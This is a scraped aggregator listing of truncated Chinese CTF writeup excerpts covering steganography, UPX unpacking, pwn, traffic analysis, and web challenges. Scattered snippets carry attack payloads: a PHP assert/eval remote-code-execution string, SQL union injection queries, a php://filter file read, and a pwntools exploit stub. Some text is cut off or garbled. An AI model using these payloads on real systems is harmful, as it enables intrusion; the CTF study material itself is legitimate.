E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
WriteUp
2021年中国工业互联网安全大赛核能行业赛道
writeup
之隐写
附件题:隐写题目描述:隐写附件下载:2021-10-12T15_44_19.174914+00_00scene.jpg.zip-网络攻防文档类资源-CSDN下载先用010Editor查看这个图片,能直接看到图片的头部是否完整正常,能直接看到是否隐藏了flag。使用Stegsolve逐个图层看,没有发现异常,尝试用binwalk搞定。binwalk-escene.jpgcd_scene.jpg.ex
苦行僧(csdn)
·
2021-10-18 23:56
信息安全
CTF
writeup
john
zip2john
2021年中国工业互联网安全大赛核能行业赛道
writeup
之hacker
附加题hacker,题目描述:hacker,附件下载hackerhttps://download.csdn.net/download/qpeity/33230528解压缩得到一个EXE文件ARE_YOU_SDPD.exe,在一个文件夹下运行看一下。用IDA反汇编一下,发现找不到程序入口,大概率加壳了。用DIE(DetectItEasy)查壳,发现是UPX加壳。那就用UPX脱壳,得到a.exe。up
苦行僧(csdn)
·
2021-10-18 00:06
信息安全
CTF
DIE
IDA
UPX
writeup
【CTF解题】BCTF2018-houseofatum-
Writeup
题解
先把ld和Libc给换成题目给的patchelf--set-interpreter./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/ld-2.26.so--replace-needed./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6./glibc-all-in-one/libs/2.26-0ubuntu
HBohan
·
2021-10-14 16:44
安全
网络
CTF
ubuntu
网络安全
计算机网络
2021年云南省职工职业技能大赛CTF流量分析题(wireshark)
WriteUp
2021年云南省职工职业技能大赛CTF流量分析题(wireshark)
WriteUp
.0x00前言本人作为业余爱好者参加了2021年云南省职工职业技能大赛的网络安全比赛,比赛形式以CTF+理论考核+模拟渗透的形式
撒旦姥爷的黑山羊คิดถึง
·
2021-10-09 10:32
渗透测试学习笔记
sql
面试
数据库
2021年绿城杯Light1ng战队
Writeup
Light1ng战队一、战队信息名称:Light1ng排名:16二、解题情况进不去平台了,没法截图了三、解题过程Web1.ezphpezphp在关于里看到个Git,所以考虑存在git泄露index.php里的php代码由于assert会进行命令执行,且$link_page参数可控,所以此处存在rce构造闭合:?link_page=flag.php','..')===true|eval($_POST
Le1a
·
2021-09-30 09:57
CTF
python
安全
2021年“绿城杯”网络安全大赛部分
Writeup
文章目录MISC签到[warmup]音频隐写Reverse[warmup]easy_reCryptoRSA-1[warmup]加密算法RSA2-PLUSMISC签到题目描述:关注“网信郑州”虽然下架了但是还是想吐槽一下/doge[warmup]音频隐写手速题,题目给了一个附件标题音频隐写,直接用Audacity打开,导入数据,转频谱图,拖到最后。接着手打或者OCR都可以flag{f8fbb2c76
塞纳河畔的春水
·
2021-09-29 21:26
CTF_Writeup
网络安全
算法
密码学
python
pycharm
2021年“羊城杯”网络安全大赛部分
Writeup
文章目录MISC签到赛博德国人MISC520Baby_ForeniscCryptoBigrsaRingRingRingMISC签到题目描述:猜数字01-30,数字序列以Sanfor{md5(**-**-**-**)}形式提交附件为一张gif猛猜图128准则图28卦阵图330而立之年图4北斗7星图54大才子图6歼-20图72只黄鹂鸣翠柳图817来看流星雨图923号乔丹图101马当先图1112黄道图1
塞纳河畔的春水
·
2021-09-13 10:44
CTF_Writeup
网络安全
算法
python
pycharm
密码学
羊城杯2021-网络安全大赛部分
writeup
1.签到图1是二八定律(28),图2是八卦(8),图3是三十而立(30),图4是北斗七星(07),图5是江南四大才子(04),图6是歼20(20),图7是两个黄鹂(02),图8是一起来看流星雨(一起谐音17),图9是乔丹的球服(23),图10是一马当先(01),图11是十二星座(12),图12是19点播放的新闻联播(19)2.Ez_android反编译得到核心代码:packagetop.zjax.
KogRow
·
2021-09-11 22:18
CTF
apk逆向
杂项
网络安全
CTF
WMCTF 2021 pwn dy_maze
writeup
frompwnimport*fromLibcSearcherimport*frombinasciiimporta2b_base64importoscontext(log_level='debug',os='linux',arch='amd64',bits=64)context.terminal=['/usr/bin/x-terminal-emulator','-e']Interfacelocal=
·
2021-09-01 19:37
python
2021DASCTF八月挑战赛
Writeup
文章目录MISC签到寒王'sblogstealerCRYPTOeasymathlet'splaywithrsa~ezRSAREVERSEpy看大佬们都不想写这个wp那我写一个吧OrzMISC签到看看公告flag{welcome_to_dasctf_aug}寒王'sblog好家伙,不知道gitee是什么根本找不到。直接在url后面加上/flag.jpg访问仓库:https://hanwang2333
塞纳河畔的春水
·
2021-08-31 10:41
CTF_Writeup
网络安全
python
pycharm
github
数据仓库
2021第二届“祥云杯”网络安全大赛 部分
Writeup
文章目录MISCChieftainsSecret鸣雏恋层层取证shuffle_codeReverseRev_DizzyMISCChieftainsSecret题目描述:Ouragentriskedhislifetoinstallamysteriousdeviceintheimmemorialtelephone,canyoufindoutthechieftain'stelephonenumber?F
塞纳河畔的春水
·
2021-08-23 14:59
CTF_Writeup
网络安全
第二届“祥云杯”网络安全大赛暨吉林省第四届大学生网络安全大赛
WriteUp
2021年祥云杯misc
团队汇总WP:n03tack6web+4misc+4crypto+2re+3pwn层层取证层层套娃取证(确信)给了一个内存和一个虚拟磁盘的取证,先看磁盘,取证大师打开提示存在bitlocker加密用PasswareKitForensic2021v1(64-bit)能直接梭出来bitlocker的秘钥方法是把001解压出来,然后把2.ntfs放进去,再选择有内存镜像,导入这道题的内存镜像,然后等待…
是Mumuzi
·
2021-08-23 12:48
ctf
XCTF-web-新手练习
writeup
持续更新ing
robots题目:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。解题思路:看到robots协议,首先了解robots协议是什么。robots协议:互联网上的君子协议,告诉搜索爬虫引擎该网站不想要展示的内容,一般存放在网站的根目录下,文本名为“robots.txt”。访问网站根目录下的robots.txt文件,可以看到该文件中表明该网站有一个“fla
Pig_deng饲养员
·
2021-08-12 10:48
封神台 sql 注入靶场
writeup
今天给大家带来封神台sql注入靶场前4关的解题思路,并不算难。地址https://hack.zkaq.cn/battle#bid=cd23d4b58f0dfd3e0x01首先判断是否存在注入点,修改地址,尝试id=1and1=1可以正常显示数据,id=1and1=2无法显示数据,故存在注入。继续猜解字段数,id=1orderby1可以正常显示数据,一直到4才无法显示,故字段数为3,使用id=1an
三分灰
·
2021-07-21 22:19
2021第五届强网杯网络安全挑战赛决赛-crypto
writeup
2021第五届强网杯网络安全挑战赛决赛-crypto
writeup
不垫底就算成功蛮恶心的,差点因为服务器太慢出不来fromsage.stats.distributions.discrete_gaussian_integerimportDiscreteGaussianDistributionIntegerSamplerfromrandomimportrandint
ljahum
·
2021-07-15 12:44
ctf
XCTF Final Web1
Writeup
Bestphp这道题提供三个文件index.php、function.php、admin.phpindex.phpfunction.php$value){if(preg_match('/eval|assert|exec|passthru|glob|system|popen/i',$value)){die('Donothackme!');}}}?>admin.phphelloadmin解题思路一变量
_阿烨_
·
2021-06-26 19:38
i春秋
writeup
1.sql题目地址http://baabb3c37fcb429b9a2a71dbe623a29ee49724ec66094043.game.ichunqiu.com爆破数据库名?id=1unioct1,database(),3爆表:?id=1unionselecnseleminformation_schema.columnswheretable_name='info'爆值flag:?id=1uni
BerL1n
·
2021-06-26 18:40
2018-11-02-[实验吧]-web-
writeup
一.简单的登录题进入首页以后是一个登录框然后抓包的时候发现一个小提示:p2然后直接get这个文件下来看看.其中test.php的源代码如下所示:define("SECRET_KEY",'***********');#秘钥define("METHOD","aes-128-cbc");#cbc模式,一个模块加密以后拿去与下一个模块异或,然后下一个模块再加密error_reporting(0);#设置错
最初的美好_kai
·
2021-06-26 05:36
SUCTF 2019
WriteUp
WebMisc签到题给了一串编码,制作:打开网页就可以得到flag。game查看源代码得到:base32解密是一个假的flag。在/js/three.min.js里可以找到一个图片:iZwz9i9xnerwj6o7h40eauZ.png。在图片的lsb隐写里可以发现信息:U2FsdGVkX1+zHjSBeYPtWQVSwXzcVFZLu6Qm0To/KeuHg8vKAxFrVQ==3DES的加密密
Eumenides_62ac
·
2021-06-25 03:18
CSA CTF 2019 Web Write up
title:CSACTF2019Web
Writeup
date:2019-05-0420:55:18tags:-CTF-CSACTF-webcategories:-CTF-CSACTF2019在ctftime
Miracle778
·
2021-06-24 16:36
第四届C1ctf(合肥工业大学校赛)
Writeup
比赛时间:2018-12-0809:00:002018-12-0922:00:00比赛地址:ctf.c1sec.clubMisc签到题目描述签到.png解题思路base64解码一下就行解题步骤base64解密.pngFALG值:C1CTF{w3lec0me_tO_C1CTF}findtheflag~题目描述findtheflag~.png解题思路ssh命令远程登录服务器,双击tab键,可查看当前所
蓝小俊
·
2021-06-22 23:28
实验吧CTF-隐写术
Writeup
实验吧-隐写术-欢迎来到地狱
Writeup
压缩包解压后图片损坏,那么修复,丢进winhex修复(工具自行google)jpg的文件头:FFD8FFE1image.png右击编辑---添加0字节---填写
码农起步者
·
2021-06-22 00:33
实验吧CTF密码学
Writeup
-疑惑的汉字
Writeup
疑惑的汉字分值:10来源:实验吧难度:易参与人数:4948人GetFlag:3029人答题人数:3130人解题通过率:97%现有一段经过加密的密文,内容如下:王夫井工夫口由中人井中夫夫由中大。请找出这段密文隐藏的消息明文。格式:CTF{}解题链接:http://ctf5.shiyanbar.com/423/crypto/1.html当铺密码----当前汉字有多少笔画出头,就是转化成数字几。。根据汉
码农起步者
·
2021-06-21 09:14
2019-01-17-Vulnhub渗透测试实战
writeup
(15)
Kioptrix4nmap结果如下:#Nmap7.40scaninitiatedWedJan1604:43:102019as:nmap-A-sV-p--Pn-oN123.xml192.168.110.141Nmapscanreportfor192.168.110.141Hostisup(0.0015slatency).Notshown:39528closedports,26003filteredp
最初的美好_kai
·
2021-06-20 00:31
2019-01-14-Vulnhub渗透测试实战
writeup
(12)
bsidesvancouver2018先上首页:p1然后nmap:#Nmap7.40scaninitiatedSunJan1322:32:562019as:nmap-p--A-sV-oNtest.xml192.168.110.139Nmapscanreportfor192.168.110.139Hostisup(0.0010slatency).Notshown:65532closedportsPO
最初的美好_kai
·
2021-06-19 21:38
2019 Openctf Web
WriteUp
i_love_cookieid=guest,改成id=admin即可。proxy看到一个链接:/index.php?url=http://naver.com猜测是文件包含,可以读到admin.php:/index.php?url=php://filter/read=convert.base64-encode/resource=admin.php".$flag."";}else{echo"no...
Eumenides_62ac
·
2021-06-16 10:17
BUUCTF PWN
WriteUp
test_your_nc$ncnode3.buuoj.cn29017$cat/flagripint__cdeclmain(intargc,constchar**argv,constchar**envp){chars;//[rsp+1h][rbp-Fh]puts("pleaseinput");gets(&s,argv);puts(&s);puts("ok,bye!!!");return0;}gets
Eumenides_62ac
·
2021-06-15 12:28
bugku-
writeup
-web-文件包含
“bugku-web14解题思路记录。”题目:clickme?no01—找线索点击clickme?no显示index.php,URL为http://114.67.246.176:19952/index.php?file=show.php,可能存在文件包含漏洞。CTF中经常使用的是php://filter和php://inputphp://filter用于读取源码php://input用于执行php
dark2019
·
2021-06-14 17:09
信息安全
安全
web
CTF_论剑场_
writeup
头像用16进制编辑器打开搜索flag就找到了,也算不上坑,就是找到的flag还要经过base64解密后再来进行MD5加密签到没什么说的,flag已经给了0和1的故事这题目我还是看了
Writeup
之后才知道的
Ithaca__Tavern
·
2021-06-13 19:03
[xssgame]
writeup
xssgame
writeup
level1很简单就好了level2先测试一下没用(我猜也是)F12看源码发现写到attribute里面了-w919闭合一下就好了1');alert('1level3发现他改变
ckj123
·
2021-06-13 14:05
2019-08-25-Vulnhub渗透测试实战
writeup
(19)
emmm这次镜像拖了很久。。。#Symfonos2p1首先上nmap结果:root@HLKali:~#nmap-p--A-sV172.16.64.133StartingNmap7.40(https://nmap.org)at2019-08-2511:27EDTNmapscanreportfor172.16.64.133Hostisup(0.00064slatency).Notshown:65530
最初的美好_kai
·
2021-06-13 10:09
hackim-2019
WriteUp
题目链接Webescape可以看到是关于Node.JS沙箱逃逸的。可以先查看目标模块的信息:/run?js=Error().stack可以看出题目设置的模块vm2。所以可能下面这个反弹shell的模块不适用:(function(){varnet=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);varclien
Eumenides_62ac
·
2021-06-12 22:58
Writeup
实验吧/密码学/变异凯撒/2038
http://www.shiyanbar.com/ctf/20380x00猜测,fla对应afZ,分别移位5,6,7因此,写代码实现:defcaesar_variant_decode(ciphertext):ans=''i=5foriteminciphertext:ans+=chr(ord(item)+i)i+=1returnans得到flag:flag{Caesar_variation}
growing27
·
2021-06-11 06:55
记第五赛区信息安全铁人三项赛之企业赛的
Writeup
0x01找到这个Hint时,我发现这个是snmp的一个漏洞,使用参考网站,我们首先先爆破出SNMP字符串,这里我们使用Metasploit这个工具,执行命令msf>useauxiliary/scanner/snmp/snmp_login查看一下options,我们可以只修改RHOST指向靶机的IP地址,执行run命令命令执行图如图所示,admin就是SNMP的字符串,之后我们就可以开始大胆的想法了
土豆豆一只
·
2021-06-10 10:54
2019-01-28-Vulnhub渗透测试实战
writeup
(18)
emmm,这次下载镜像等了好久,下了个typhoon了....如图:p1#Nmap7.40scaninitiatedSunJan2723:04:172019as:nmap-p--sV-Pn-A-oNtest.xml192.168.110.144Nmapscanreportfor192.168.110.144Hostisup(0.00097slatency).Notshown:65511closed
最初的美好_kai
·
2021-06-09 00:49
2019-03-18 实验吧-Debug
WriteUp
分析过程1、首先,将文件放入IDA,发现是elf类型文件图12、字符串定位,View->OpenSubviews->Strings(快捷键:Shift+F12),发现flag字样。图23、双击Printingflag,发现XREF交叉引用,继续双击XREF,向前追踪,发现0x0804849b为该函数起始地址。图3图四4、在linux下运行程序,发现无任何显示,可设置断点b__libc_start_
东方Chris
·
2021-06-08 16:07
[SCU校赛]Web部分-
Writeup
文章目录写在前面入门fastapi解法一解法二解法三shell奇妙的验证码野兽先辈的文件Bypass_waf解法一解法二解法三uploadunserializeez_uploadeasy_yiiez_authnot_sql有手就行推荐文章写在前面我出的题不太难,但是有意思,个人感觉质量还是不错的,有简单有难,区分度明显,这里出个部分wp,这里感谢atao让本懒狗少了一部分工作量o( ̄▽ ̄)ブ入门f
Y4tacker
·
2021-06-07 16:06
安全学习
#
Web
#
CTF记录
2019-01-21-Vulnhub渗透测试实战
writeup
(16)
Raven2....p1nmap如下:#Nmap7.40scaninitiatedSunJan2022:19:342019as:nmap-p--A-sV-oN1.xml192.168.110.142Nmapscanreportfor192.168.110.142Hostisup(0.0013slatency).Notshown:65531closedportsPORTSTATESERVICEVER
最初的美好_kai
·
2021-06-06 23:27
第四届全国网络空间安全技术大赛
writeup
web2进去后url如下:http://117.34.116.192/index.php?file=login.html这道题一看url格式,便考虑到PHP文件包含。但是使用php://filter和php://input进行测试的时候,发现“:”被过滤了。于是一套乱摸,倒是摸到了两个敏感文件:http://117.34.116.192/index.php?file=../../../../etc
平_繁
·
2021-06-05 23:30
websec.fr
writeup
level01sqlite注入1unionselect1,sqlfromsqlite_master找到password字段0unionselect1,passwordasusernamefromuserswhereid=1level04unserialize对象注入最终回显的字段是username,使用as关键字query='selectpasswordasusernamefromusers';$
blackJdog
·
2021-06-05 08:02
ddctf2019_
writeup
滴~题目urlhttp://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09感觉像是包含,先解码一下参数,然后发现是两次base,变成了hex编码,再decode就发现是flag.jpg,所以可以尝试包含index.php,转换之后的值是TmprMlJUWTBOalUzT0RKRk56QTJPRGN3,提交可获得index.
wulasite
·
2021-06-05 01:25
安恒11月月赛周周练
writeup
前言11月月赛完美错过时间,正好有周周练,基本都是一样月赛的web,记录下
writeup
手速要快这题是10月月赛中的一题,直接看我上次的
writeup
:安恒月赛(十)web-2题
writeup
,这里不重复了
二歪求知iSk2y
·
2021-06-04 22:47
session upload get shell
以SCTF2018BabySyc-SimplePHP为例子官方正解:https://www.cnblogs.com/iamstudy/articles/sctf2018_simple_php_web_
writeup
.htmlsessionupload
_阿烨_
·
2021-06-04 13:22
铁三选拔
writeup
web这里什么都没有的签到网页名是LFI,LFI是本地包含漏洞的缩写,先用伪协议看看index.php的源代码php://filter/read=convert.base64-encode/resource=index.phpLFIbase64解密后得到LFIè¿�é��ä»�ä¹�é�½æ²¡æ��~50:print'nicetry'exit()iflen(flag)%5!=0:print'ni
FateKey
·
2021-05-20 22:48
CISCN2021初赛
WriteUp
第一次打ctf,啥也没学,赛前一道题没做过,了解了下IDA的使用就上了。glass200分reverse,安卓逆向,.apk改.zip解压,classes.dex转classes.jar后打开,找到MainActivity开始读代码。发现调用了publicnativebooleancheckFlag(StringparamString);这样一个函数,但这个函数并没有写出来。搜了一下native关
Hellsegamosken
·
2021-05-19 16:31
杂题瞎记
逆向
ctf
2017第十届全国大学生安全竞赛
本着以学习的态度来记录下这次所学到的知识这里有web和misc的
writeup
http://lorexxar.cn/2017/07/11/guosai2017/一、第一个web题awvs扫了一下,存在php
Sund4y
·
2021-05-19 03:25
2018-02-05week1部分WP
edit:逆向的2和4感觉推的没问题但是提交不对,就很难受edit的edit:看了大佬WP,果然思路错了,瘫平官方WP:https://github.com/vidar-team/Hgame2018_
writeup
WEB-AreyoufromEurope
ylylhl
·
2021-05-18 20:27
2018-09-26-Vulnhub渗透测试实战
writeup
(3)
老规矩,先上nmap.....nmap-sV10.10.10.142结果如下:PORTSTATESERVICEVERSION22/tcpopensshOpenSSH6.6.1p1Ubuntu2ubuntu2.8(UbuntuLinux;protocol2.0)80/tcpopenhttpApachehttpd2.4.7((Ubuntu))139/tcpopennetbios-ssnSambasmb
最初的美好_kai
·
2021-05-18 20:16
【CISCN2021】第十四届全国大学生信息安全竞赛初赛-
writeup
这一次比赛分为三张“卷子”,我就直接归在一起吧场景实操Misctinytrafficrunning_pixel隔空传话Webeasy_sqlEasy_sourcemiddle_sourceReverseglassbaby_bcPwnPwnyGamewpLonelywolfCryptoRSAMisctinytraffic打开流量包根据文件和题目描述,我们直接导出http对象可以看到,列表里面含有gz
菲奥娜__
·
2021-05-17 08:30
CISCN
CISCN2021
第十四届全国大学生信息安全竞赛-线上赛
Writeup
文章目录场景实操开场卷WEBeasy_sqleasy_sourceMISCtinytrafficrunning_pixel场景实操二阶卷WEBmiddle_sourceMISC隔空传话场景实操冲刺卷MISCrobot场景实操开场卷WEBeasy_sql有sql报错简单fuzz了一下发现过滤了union、information、column、inno等关键字。无表名,无列名注入。但是sqlmap还可
末 初
·
2021-05-16 20:17
CTF_WEB_Writeup
上一页
8
9
10
11
12
13
14
15
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他